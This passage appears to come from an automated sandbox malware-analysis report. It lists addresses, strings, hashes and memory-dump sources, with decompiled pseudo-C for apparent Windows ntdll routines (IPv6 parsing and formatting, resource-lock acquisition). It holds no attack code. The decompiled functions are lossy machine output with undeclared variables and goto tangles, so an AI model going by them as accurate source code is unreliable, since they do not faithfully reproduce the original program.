0x00e5e337
0x00e5e33a
0x00e5e33b
0x00e5e33d
0x00e5e33f
0x00e5e341
0x00e5e341
0x00e5e34e
0x00e5e353
0x00e5e358
0x00e5e35d
0x00e5e35f
0x00000000
0x00000000
0x00e5e365
0x00e5e365
0x00e5e368
0x00e5e36e
0x00000000
0x00000000
0x00e5e374
0x00e5e32f
0x00e53f75
0x00e53f7a
0x00e53f7c
0x00e53f7e
0x00e53f86
0x00e37f39
0x00e37f47
0x00e37f47
0x00e37f37
0x00e37f37
0x00000000

APIs

BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 00E53F12

Strings

CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00E53EC4
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00E53F75
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00E53F4A
Execute=1, xrefs: 00E53F5E
CLIENT(ntdll): Processing section info %ws..., xrefs: 00E5E345
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 00E5E2FB
ExecuteOptions, xrefs: 00E53F04

Memory Dump Source

Source File: 00000005.00000002.2192980870.0000000000DF0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Associated: 00000005.00000002.2192976975.0000000000DE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193038356.0000000000ED0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193042325.0000000000EE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193046369.0000000000EE4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193050264.0000000000EE7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193053891.0000000000EF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193079843.0000000000F50000.00000040.00000001.sdmp Download File

Similarity

API ID: BaseDataModuleQuery
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 3901378454-484625025
Opcode ID: ce3c373b694cae7cd1863cb5cb572f6fee207bc7c0565563697759f136ec62ca
Instruction ID: 578a6f101cf736acf1aca8e5c9af33741135dc875f52a9be5bda202689371589
Opcode Fuzzy Hash: ce3c373b694cae7cd1863cb5cb572f6fee207bc7c0565563697759f136ec62ca
Instruction Fuzzy Hash: B041A872B4031C7ADB209BA4DCCAFDA73FDAB14705F0414A9B605B61D1EA709B89CF61

Uniqueness

Uniqueness Score: -1.00%

Function 00E40B15, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E40B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t108;
				void* _t116;
				char _t120;
				short _t121;
				void* _t128;
				intOrPtr* _t130;
				char _t132;
				short _t133;
				intOrPtr _t141;
				signed int _t156;
				signed int _t174;
				intOrPtr _t177;
				intOrPtr* _t179;
				intOrPtr _t180;
				void* _t183;

				_t179 = _a4;
				_t141 =  *_t179;
				_v16 = 0;
				_v28 = 0;
				_v8 = 0;
				_v24 = 0;
				_v12 = 0;
				_v32 = 0;
				_v20 = 0;
				if(_t141 == 0) {
					L41:
					 *_a8 = _t179;
					_t180 = _v24;
					if(_t180 != 0) {
						if(_t180 != 3) {
							goto L6;
						}
						_v8 = _v8 + 1;
					}
					_t174 = _v32;
					if(_t174 == 0) {
						if(_v8 == 7) {
							goto L43;
						}
						goto L6;
					}
					L43:
					if(_v16 != 1) {
						if(_v16 != 2) {
							goto L6;
						}
						 *((short*)(_a12 + _v20 * 2)) = 0;
						L47:
						if(_t174 != 0) {
							E00E18980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
							_t116 = 8;
							E00E0DFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
						}
						return 0;
					}
					if(_t180 != 0) {
						if(_v12 > 3) {
							goto L6;
						}
						_t120 = E00E40CFA(_v28, 0, 0xa);
						_t183 = _t183 + 0xc;
						if(_t120 > 0xff) {
							goto L6;
						}
						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
						goto L47;
					}
					if(_v12 > 4) {
						goto L6;
					}
					_t121 = E00E40CFA(_v28, _t180, 0x10);
					_t183 = _t183 + 0xc;
					 *((short*)(_a12 + _v20 * 2)) = _t121;
					goto L47;
				} else {
					while(1) {
						_t123 = _v16;
						if(_t123 == 0) {
							goto L7;
						}
						_t108 = _t123 - 1;
						if(_t108 != 0) {
							goto L1;
						}
						_t178 = _t141;
						if(E00E406BA(_t108, _t141) == 0 || _t135 == 0) {
							if(E00E406BA(_t135, _t178) == 0 || E00E40A5B(_t136, _t178) == 0) {
								if(_t141 != 0x3a) {
									if(_t141 == 0x2e) {
										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
											goto L41;
										} else {
											_v24 = _v24 + 1;
											L27:
											_v16 = _v16 & 0x00000000;
											L28:
											if(_v28 == 0) {
												goto L20;
											}
											_t177 = _v24;
											if(_t177 != 0) {
												if(_v12 > 3) {
													L6:
													return 0xc000000d;
												}
												_t132 = E00E40CFA(_v28, 0, 0xa);
												_t183 = _t183 + 0xc;
												if(_t132 > 0xff) {
													goto L6;
												}
												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
												goto L20;
											}
											if(_v12 > 4) {
												goto L6;
											}
											_t133 = E00E40CFA(_v28, 0, 0x10);
											_t183 = _t183 + 0xc;
											_v20 = _v20 + 1;
											 *((short*)(_a12 + _v20 * 2)) = _t133;
											goto L20;
										}
									}
									goto L41;
								}
								if(_v24 > 0 || _v8 > 6) {
									goto L41;
								} else {
									_t130 = _t179 + 1;
									if( *_t130 == _t141) {
										if(_v32 != 0) {
											goto L41;
										}
										_v32 = _v8 + 1;
										_t156 = 2;
										_v8 = _v8 + _t156;
										L34:
										_t179 = _t130;
										_v16 = _t156;
										goto L28;
									}
									_v8 = _v8 + 1;
									goto L27;
								}
							} else {
								_v12 = _v12 + 1;
								if(_v24 > 0) {
									goto L41;
								}
								_a7 = 1;
								goto L20;
							}
						} else {
							_v12 = _v12 + 1;
							L20:
							_t179 = _t179 + 1;
							_t141 =  *_t179;
							if(_t141 == 0) {
								goto L41;
							}
							continue;
						}
						L7:
						if(_t141 == 0x3a) {
							if(_v24 > 0 || _v8 > 0) {
								goto L41;
							} else {
								_t130 = _t179 + 1;
								if( *_t130 != _t141) {
									goto L41;
								}
								_v20 = _v20 + 1;
								_t156 = 2;
								_v32 = 1;
								_v8 = _t156;
								 *((short*)(_a12 + _v20 * 2)) = 0;
								goto L34;
							}
						}
						L8:
						if(_v8 > 7) {
							goto L41;
						}
						_t142 = _t141;
						if(E00E406BA(_t123, _t141) == 0 || _t124 == 0) {
							if(E00E406BA(_t124, _t142) == 0 || E00E40A5B(_t125, _t142) == 0 || _v24 > 0) {
								goto L41;
							} else {
								_t128 = 1;
								_a7 = 1;
								_v28 = _t179;
								_v16 = 1;
								_v12 = 1;
								L39:
								if(_v16 == _t128) {
									goto L20;
								}
								goto L28;
							}
						} else {
							_a7 = 0;
							_v28 = _t179;
							_v16 = 1;
							_v12 = 1;
							goto L20;
						}
					}
				}
				L1:
				_t123 = _t108 == 1;
				if(_t108 == 1) {
					goto L8;
				}
				_t128 = 1;
				goto L39;
			}

0x00e40b21
0x00e40b24
0x00e40b27
0x00e40b2a
0x00e40b2d
0x00e40b30
0x00e40b33
0x00e40b36
0x00e40b39
0x00e40b3e
0x00e40c65
0x00e40c68
0x00e40c6a
0x00e40c6f
0x00e6eb42
0x00000000
0x00000000
0x00e6eb48
0x00e6eb48
0x00e40c75
0x00e40c7a
0x00e6eb54
0x00000000
0x00000000
0x00000000
0x00e6eb5a
0x00e40c80
0x00e40c84
0x00e6eb98
0x00000000
0x00000000
0x00e6eba6
0x00e40cb8
0x00e40cba
0x00e40cd3
0x00e40cda
0x00e40ce4
0x00e40ce9
0x00000000
0x00e40cec
0x00e40c8c
0x00e6eb63
0x00000000
0x00000000
0x00e6eb70
0x00e6eb75
0x00e6eb7d
0x00000000
0x00000000
0x00e6eb8c
0x00000000
0x00e6eb8c
0x00e40c96
0x00000000
0x00000000
0x00e40ca2
0x00e40cac
0x00e40cb4
0x00000000
0x00000000
0x00e40b44
0x00e40b47
0x00e40b49
0x00000000
0x00000000
0x00e40b4f
0x00e40b50
0x00000000
0x00000000
0x00e40b56
0x00e40b62
0x00e40b7c
0x00e40bac
0x00e40a0f
0x00e6eaaa
0x00000000
0x00e6eac4
0x00e6eac4
0x00e40bd0
0x00e40bd0
0x00e40bd4
0x00e40bd9
0x00000000
0x00000000
0x00e40bdb
0x00e40be0
0x00e6eb0e
0x00e40a1a
0x00000000
0x00e40a1a
0x00e6eb1a
0x00e6eb1f
0x00e6eb27
0x00000000
0x00000000
0x00e6eb36
0x00000000
0x00e6eb36
0x00e40bea
0x00000000
0x00000000
0x00e40bf6
0x00e40c00
0x00e40c03
0x00e40c0b
0x00000000
0x00e40c0b
0x00e6eaaa
0x00000000
0x00e40a15
0x00e40bb6
0x00000000
0x00e40bc6
0x00e40bc6
0x00e40bcb
0x00e40c15
0x00000000
0x00000000
0x00e40c1d
0x00e40c20
0x00e40c21
0x00e40c24
0x00e40c24
0x00e40c26
0x00000000
0x00e40c26
0x00e40bcd
0x00000000
0x00e40bcd
0x00e40b89
0x00e40b89
0x00e40b90
0x00000000
0x00000000
0x00e40b96
0x00000000
0x00e40b96
0x00e40a04
0x00e40a04
0x00e40b9a
0x00e40b9a
0x00e40b9b
0x00e40b9f
0x00000000
0x00000000
0x00000000
0x00e40ba5
0x00e40ac7
0x00e40aca
0x00e6eacf
0x00000000
0x00e6eade
0x00e6eade
0x00e6eae3
0x00000000
0x00000000
0x00e6eaf3
0x00e6eaf6
0x00e6eaf7
0x00e6eafe
0x00e6eb01
0x00000000
0x00e6eb01
0x00e6eacf
0x00e40ad0
0x00e40ad4
0x00000000
0x00000000
0x00e40ada
0x00e40ae6
0x00e40c34
0x00000000
0x00e40c47
0x00e40c49
0x00e40c4a
0x00e40c4e
0x00e40c51
0x00e40c54
0x00e40c57
0x00e40c5a
0x00000000
0x00000000
0x00000000
0x00e40c60
0x00e40afb
0x00e40afe
0x00e40b02
0x00e40b05
0x00e40b08
0x00000000
0x00e40b08
0x00e40ae6
0x00e40b44
0x00e409f8
0x00e409f8
0x00e409f9
0x00000000
0x00000000
0x00e6eaa0
0x00000000

APIs

__fassign.LIBCMT ref: 00E40BF6
__fassign.LIBCMT ref: 00E40CA2

Strings

:, xrefs: 00E40BA9
., xrefs: 00E40A0C
:, xrefs: 00E40AC7

Memory Dump Source

Source File: 00000005.00000002.2192980870.0000000000DF0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Associated: 00000005.00000002.2192976975.0000000000DE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193038356.0000000000ED0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193042325.0000000000EE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193046369.0000000000EE4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193050264.0000000000EE7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193053891.0000000000EF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193079843.0000000000F50000.00000040.00000001.sdmp Download File

Similarity

API ID: __fassign
String ID: .$:$:
API String ID: 3965848254-2308638275
Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
Instruction ID: 8722092c35acb858ff6de31ca0fc5ac02819473caa286225b412afda76ef0f8c
Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
Instruction Fuzzy Hash: 67A1BD31D0030ADFCB24DF64E8857BEB7B4EF55308F24A97ADA02B7282D6349A41DB55

Uniqueness

Uniqueness Score: -1.00%

Function 00E40554, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E00E40554(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t49;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t61;
				signed int _t63;
				void* _t66;
				intOrPtr _t67;
				void* _t69;
				signed int _t70;
				void* _t75;
				signed int _t81;
				signed int _t84;
				void* _t86;
				signed int _t93;
				signed int _t96;
				intOrPtr _t105;
				signed int _t107;
				void* _t110;
				signed int _t115;
				signed int* _t119;
				void* _t125;
				void* _t126;
				signed int _t128;
				signed int _t130;
				signed int _t138;
				signed int _t144;
				void* _t158;
				void* _t159;
				void* _t160;

				_t96 = _a4;
				_t115 =  *(_t96 + 0x28);
				_push(_t138);
				if(_t115 < 0) {
					_t105 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
						goto L6;
					} else {
						__eflags = _t115 | 0xffffffff;
						asm("lock xadd [eax], edx");
						return 1;
					}
				} else {
					L6:
					_push(_t128);
					while(1) {
						L7:
						__eflags = _t115;
						if(_t115 >= 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x00ee01c0;
									_push(_t144);
									_push(0);
									_t51 = E00DFF8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = E00E44FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									E00E53F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									E00E53F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E00E8217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E00E53F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									E00E43915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x00ee01c0;
												_push(_t138);
												_push(0);
												_t58 = E00DFF8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = E00E44FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												E00E53F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												E00E53F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E00E8217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												E00E53F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												E00E43915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E00E25384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = E00DFF970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														E00E43915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = E00DFF970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															E00E43915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = E00DFF970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = E00E43915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
																	}
																	goto L59;
																}
																E00E25329(_t110, _t138);
																_t69 = E00E253A5(_t138, 1);
																return _t69;
															}
														}
													}
												}
											} else {
												_t56 =  *(_t96 + 0x28);
												goto L3;
											}
										} else {
											_t107 =  *_t119;
											__eflags = _t107;
											if(__eflags > 0) {
												while(1) {
													_t81 = _t107;
													asm("lock cmpxchg [edi], esi");
													__eflags = _t81 - _t107;
													if(_t81 == _t107) {
														break;
													}
													_t107 = _t81;
													__eflags = _t81;
													if(_t81 > 0) {
														continue;
													}
													break;
												}
												_t56 = _a4;
												__eflags = _t107;
											}
											if(__eflags != 0) {
												while(1) {
													L3:
													__eflags = _t56;
													if(_t56 != 0) {
														goto L32;
													}
													_t107 = _t107 | 0xffffffff;
													_t56 = 0;
													asm("lock cmpxchg [edx], ecx");
													__eflags = 0;
													if(0 != 0) {
														continue;
													} else {
														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
														return 1;
													}
													goto L59;
												}
												continue;
											} else {
												goto L40;
											}
										}
										goto L59;
									}
									__eflags = 0;
									return 0;
								} else {
									_t115 =  *(_t96 + 0x28);
									continue;
								}
							} else {
								_t106 =  *_t49;
								__eflags = _t106;
								if(__eflags > 0) {
									while(1) {
										_t93 = _t106;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t93 - _t106;
										if(_t93 == _t106) {
											break;
										}
										_t106 = _t93;
										__eflags = _t93;
										if(_t93 > 0) {
											continue;
										}
										break;
									}
									__eflags = _t106;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L23;
								}
							}
						}
						goto L59;
					}
					_t84 = _t115;
					asm("lock cmpxchg [esi], ecx");
					__eflags = _t84 - _t115;
					if(_t84 != _t115) {
						_t115 = _t84;
						goto L7;
					} else {
						return 1;
					}
				}
				L59:
			}

0x00e4055a
0x00e4055d
0x00e40563
0x00e40566
0x00e405d8
0x00e405e2
0x00e405e5
0x00000000
0x00e405e7
0x00e405e7
0x00e405ea
0x00e405f3
0x00e405f3
0x00e40568
0x00e40568
0x00e40568
0x00e40569
0x00e40569
0x00e40569
0x00e4056b
0x00000000
0x00000000
0x00e6217f
0x00e62183
0x00e6225b
0x00e6225f
0x00e62189
0x00e6218c
0x00e6218f
0x00e62194
0x00e62199
0x00e6219d
0x00e621a0
0x00e621a2
0x00e621ce
0x00e621ce
0x00e621ce
0x00e621d0
0x00e621d6
0x00e621de
0x00e621e2
0x00e621e8
0x00e621e9
0x00e621ec
0x00e621f1
0x00e621f6
0x00000000
0x00000000
0x00e621f8
0x00e621fb
0x00e62206
0x00e6220b
0x00e6220c
0x00e62217
0x00e62226
0x00e6222b
0x00e6222c
0x00e6222f
0x00e62232
0x00e62235
0x00e62235
0x00e6223a
0x00e6223f
0x00e62241
0x00e62243
0x00e62248
0x00e62248
0x00e6224d
0x00e6224f
0x00e62262
0x00e62263
0x00e62268
0x00e62269
0x00e62269
0x00e62269
0x00e6226d
0x00000000
0x00000000
0x00e62276
0x00e62279
0x00e6227e
0x00e62283
0x00e62287
0x00e6228a
0x00e6228d
0x00e6228f
0x00e622bc
0x00e622bc
0x00e622bc
0x00e622be
0x00e622c4
0x00e622cc
0x00e622d0
0x00e622d6
0x00e622d7
0x00e622da
0x00e622df
0x00e622e4
0x00000000
0x00000000
0x00e622e6
0x00e622e9
0x00e622f4
0x00e622f9
0x00e622fa
0x00e62305
0x00e62314
0x00e62319
0x00e6231a
0x00e6231d
0x00e62320
0x00e62323
0x00e62323
0x00e62328
0x00e6232d
0x00e6232f
0x00e62331
0x00e62336
0x00e62336
0x00e6233b
0x00e6233d
0x00e62350
0x00e62351
0x00e62356
0x00e62359
0x00e62359
0x00e6235b
0x00e6235d
0x00e25367
0x00e2536b
0x00e25372
0x00000000
0x00000000
0x00000000
0x00000000
0x00e62363
0x00e62363
0x00e62369
0x00e6236a
0x00e6236c
0x00e62371
0x00e62373
0x00000000
0x00e62379
0x00e62379
0x00e6237a
0x00e6237f
0x00e6237f
0x00e62385
0x00e62386
0x00e62389
0x00e6238e
0x00e62390
0x00e25378
0x00e2537c
0x00e62396
0x00e62396
0x00e62397
0x00e6239c
0x00e623a2
0x00e623a3
0x00e623a6
0x00e623ab
0x00e623ad
0x00000000
0x00e623b3
0x00e623b3
0x00e623b4
0x00e623b9
0x00e623ba
0x00e623ba
0x00e623bc
0x00e623bf
0x00000000
0x00000000
0x00e59153
0x00e59158
0x00e5915a
0x00e5915e
0x00e59160
0x00000000
0x00e59166
0x00e59166
0x00e59171
0x00e59176
0x00e59176
0x00000000
0x00e59160
0x00e623c6
0x00e623ce
0x00e623d7
0x00e623d7
0x00e623ad
0x00e62390
0x00e62373
0x00e6233f
0x00e6233f
0x00000000
0x00e6233f
0x00e62291
0x00e62291
0x00e62293
0x00e62295
0x00e6229a
0x00e622a1
0x00e622a3
0x00e622a7
0x00e622a9
0x00000000
0x00000000
0x00e622ab
0x00e622ad
0x00e622af
0x00000000
0x00000000
0x00000000
0x00e622af
0x00e622b1
0x00e622b4
0x00e622b4
0x00e622b6
0x00e253be
0x00e253be
0x00e253be
0x00e253c0
0x00000000
0x00000000
0x00e253cb
0x00e253ce
0x00e253d0
0x00e253d4
0x00e253d6
0x00000000
0x00e253d8
0x00e253e3
0x00e253ea
0x00e253ea
0x00000000
0x00e253d6
0x00000000
0x00000000
0x00000000
0x00000000
0x00e622b6
0x00000000
0x00e6228f
0x00e62349
0x00e6234d
0x00e62251
0x00e62251
0x00000000
0x00e62251
0x00e621a4
0x00e621a4
0x00e621a6
0x00e621a8
0x00e621ac
0x00e621b6
0x00e621b8
0x00e621bc
0x00e621be
0x00000000
0x00000000
0x00e621c0
0x00e621c2
0x00e621c4
0x00000000
0x00000000
0x00000000
0x00e621c4
0x00e621c6
0x00e621c6
0x00e621c8
0x00000000
0x00000000
0x00000000
0x00000000
0x00e621c8
0x00e621a2
0x00000000
0x00e62183
0x00e4057b
0x00e4057d
0x00e40581
0x00e40583
0x00e62178
0x00000000
0x00e40589
0x00e4058f
0x00e4058f
0x00e40583
0x00000000

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E62206

Strings

RTL: Resource at %p, xrefs: 00E6221D, 00E6230B
RTL: Re-Waiting, xrefs: 00E6223A, 00E62328
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 00E622FC
RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 00E6220E

Memory Dump Source

Source File: 00000005.00000002.2192980870.0000000000DF0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Associated: 00000005.00000002.2192976975.0000000000DE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193038356.0000000000ED0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193042325.0000000000EE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193046369.0000000000EE4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193050264.0000000000EE7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193053891.0000000000EF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193079843.0000000000F50000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-4236105082
Opcode ID: bdbcd7b33e165f97b129c50d79265103e549b2bdb6c9827fd15019251d04ba7a
Instruction ID: 7940ce67ea471800adcf40d6604d75b7772aa3da3727fea9915ea28ecac29ebb
Opcode Fuzzy Hash: bdbcd7b33e165f97b129c50d79265103e549b2bdb6c9827fd15019251d04ba7a
Instruction Fuzzy Hash: BF515C717406115BDB14CA14EC81FA633EAAFD4755F21A22DFE08FB2C5D971EC4187A0

Uniqueness

Uniqueness Score: -1.00%

Function 00E414C0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E00E414C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v10;
				char _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				void* _t26;
				signed int _t29;
				signed int _t34;
				signed int _t40;
				intOrPtr _t45;
				void* _t51;
				intOrPtr* _t52;
				void* _t54;
				signed int _t57;
				void* _t58;

				_t51 = __edx;
				_t24 =  *0xee2088; // 0x774cb321
				_v8 = _t24 ^ _t57;
				_t45 = _a16;
				_t53 = _a4;
				_t52 = _a20;
				if(_a4 == 0 || _t52 == 0) {
					L10:
					_t26 = 0xc000000d;
				} else {
					if(_t45 == 0) {
						if( *_t52 == _t45) {
							goto L3;
						} else {
							goto L10;
						}
					} else {
						L3:
						_t28 =  &_v140;
						if(_a12 != 0) {
							_push("[");
							_push(0x41);
							_push( &_v140);
							_t29 = E00E37707();
							_t58 = _t58 + 0xc;
							_t28 = _t57 + _t29 * 2 - 0x88;
						}
						_t54 = E00E413CB(_t53, _t28);
						if(_a8 != 0) {
							_t34 = E00E37707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t34 * 2;
						}
						if(_a12 != 0) {
							_t40 = E00E37707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t40 * 2;
						}
						_t53 = (_t54 -  &_v140 >> 1) + 1;
						 *_t52 = _t53;
						if( *_t52 < _t53) {
							goto L10;
						} else {
							E00E02340(_t45,  &_v140, _t53 + _t53);
							_t26 = 0;
						}
					}
				}
				return E00E0E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
			}

0x00e414c0
0x00e414cb
0x00e414d2
0x00e414d6
0x00e414da
0x00e414de
0x00e414e3
0x00e4157a
0x00e4157a
0x00e414f1
0x00e414f3
0x00e6ea0f
0x00000000
0x00e6ea15
0x00000000
0x00e6ea15
0x00e414f9
0x00e414f9
0x00e414fe
0x00e41504
0x00e6ea1a
0x00e6ea1f
0x00e6ea21
0x00e6ea22
0x00e6ea27
0x00e6ea2a
0x00e6ea2a
0x00e41515
0x00e41517
0x00e4156d
0x00e41572
0x00e41575
0x00e41575
0x00e4151e
0x00e6ea50
0x00e6ea55
0x00e6ea58
0x00e6ea58
0x00e4152e
0x00e41531
0x00e41533
0x00000000
0x00e41535
0x00e41541
0x00e41549
0x00e41549
0x00e41533
0x00e414f3
0x00e41559

APIs

___swprintf_l.LIBCMT ref: 00E6EA22

Part of subcall function 00E413CB: ___swprintf_l.LIBCMT ref: 00E4146B
Part of subcall function 00E413CB: ___swprintf_l.LIBCMT ref: 00E41490

___swprintf_l.LIBCMT ref: 00E4156D
